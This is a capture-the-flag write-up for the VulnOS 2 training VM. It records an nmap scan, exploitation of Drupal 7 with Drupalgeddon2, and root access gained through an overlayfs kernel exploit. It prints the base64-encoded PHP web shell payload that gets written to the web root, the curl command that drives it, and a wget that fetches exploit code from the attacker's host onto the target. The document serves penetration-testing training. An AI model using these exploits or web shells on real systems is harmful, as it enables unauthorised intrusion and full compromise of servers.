Vulnhub - VulnOS 2 Writeup
Description
Vulnhub - VulnOS 2. VulnOS are a series of vulnerable operating systems packed as virtual images to enhance penetration testing skills. This is version 2 - Smaller, less chaotic ! As time is not always on my side, It took a long time to create another VulnOS. But I like creating them. The image is build with VBOX. Unpack the file and add it to your virtualisation software. Your assignment is to pentest a company website, get root of the system and read the final flag
Enumeration
Start off with an nmap
scan
Nmap
Nmap scan report for vulnos.com (192.168.113.4)
Host is up, received arp-response (0.00042s latency).
Scanned at 2020-03-14 08:06:25 EDT for 27s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc syn-ack ttl 64 ngircd
MAC Address: 08:00:27:57:4F:AA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 198.841 days (since Wed Aug 28 11:56:06 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
# Nmap done at Sat Mar 14 08:06:52 2020 -- 1 IP address (1 host up) scanned in 29.33 seconds
We get hits on different ports such as 22 [SSH], 80[HTTP] and 6667[irc]. The target seems to be running a webserver.
On opening the website we are greeted with a message from the author. The vulnerable web application is hosted at http://vulnos.com/jabc/
Wappalyzer
wappalyzer
is a firefox plugin that can be used to id the technologies used by a website.
We have drupal 7
as the CMS. Do a quick search using searchsploit
to see if there are any exploits available.
kali@kali:~/Desktop/vulnhub/vulnos$ searchsploit drupal 7 | cut -b 1-150
------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit Title
------------------------------------------------------------------------------------------------------------------------------------------------------
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution
Drupal 4.x - URL-Encoded Input HTML Injection
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)
Drupal 7.12 - Multiple Vulnerabilities
Drupal 7.x Module Services - Remote Code Execution
Drupal < 4.7.6 - Post Comments Remote Command Execution
Drupal < 5.22/6.16 - Multiple Vulnerabilities
Drupal < 7.34 - Denial of Service
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
------------------------------------------------------------------------------------------------------------------------------------------------------
Low Shell
After going through multiple possible exploits, I found one that was working.
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - ‘Drupalgeddon2’ Remote Code Execution
Copy the exploit to kali
machine and run the exploit to get a shell.
kali@kali:~/Desktop/vulnhub/vulnos$ ruby drupadaggon.rb http://vulnos.com/jabc
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://vulnos.com/jabc/
[i] Proxy : 127.0.0.1:8080
--------------------------------------------------------------------------------
[!] MISSING: http://vulnos.com/jabc/CHANGELOG.txt (HTTP Response: 404)
[!] MISSING: http://vulnos.com/jabc/core/CHANGELOG.txt (HTTP Response: 404)
[+] Found : http://vulnos.com/jabc/includes/bootstrap.inc (HTTP Response: 200)
[!] WARNING: Could be a false-positive [1-1], as the file could be reported to be missing
[!] MISSING: http://vulnos.com/jabc/includes/bootstrap.inc (HTTP Response: 200)
[!] MISSING: http://vulnos.com/jabc/core/includes/bootstrap.inc (HTTP Response: 404)
[!] MISSING: http://vulnos.com/jabc/includes/database.inc (HTTP Response: 404)
[+] Found : http://vulnos.com/jabc/ (HTTP Response: 200)
[+] Metatag: v7.x [Generator]
[!] MISSING: http://vulnos.com/jabc/ (HTTP Response: 200)
[+] Drupal?: v7.x
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo OUNCKHJJ
[+] Result : OUNCKHJJ
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://vulnos.com/jabc/shell.php)
[!] Response: HTTP 200 // Size: 6. ***Something could already be there?***
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://vulnos.com/jabc/shell.php' -d 'c=hostname'
VulnOSv2>> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Root Shell
The kernel version of the system is
[-] Kernel information:
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
kali@kali:~/Desktop/vulnhub/vulnos$ searchsploit ubuntu 3.13.0 | cut -b 1-150
-------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit Title
-------------------------------------------------------------------------------------------------------------------------------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)
-------------------------------------------------------------------------------------------------------------------------------------------------------
We have an Ubuntu kernel exploit. that can be used.
Copy the exploit Ubuntu
kernel exploit, compile it and run to get root
.
www-data@VulnOSv2:/tmp$ wget http://192.168.1.9:8000/overlays.c
wget http://192.168.1.9:8000/overlays.c
--2020-03-22 17:20:06-- http://192.168.1.9:8000/overlays.c
Connecting to 192.168.1.9:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4982 (4.9K) [text/plain]
Saving to: 'overlays.c'
100%[======================================>] 4,982 --.-K/s in 0s
2020-03-22 17:20:06 (769 MB/s) - 'overlays.c' saved [4982/4982]
www-data@VulnOSv2:/tmp$ gcc overlays.c
gcc overlays.c
www-data@VulnOSv2:/tmp$ ./a.out
./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls
ls
flag.txt
# cat flag.txt
cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?
#
We are root!.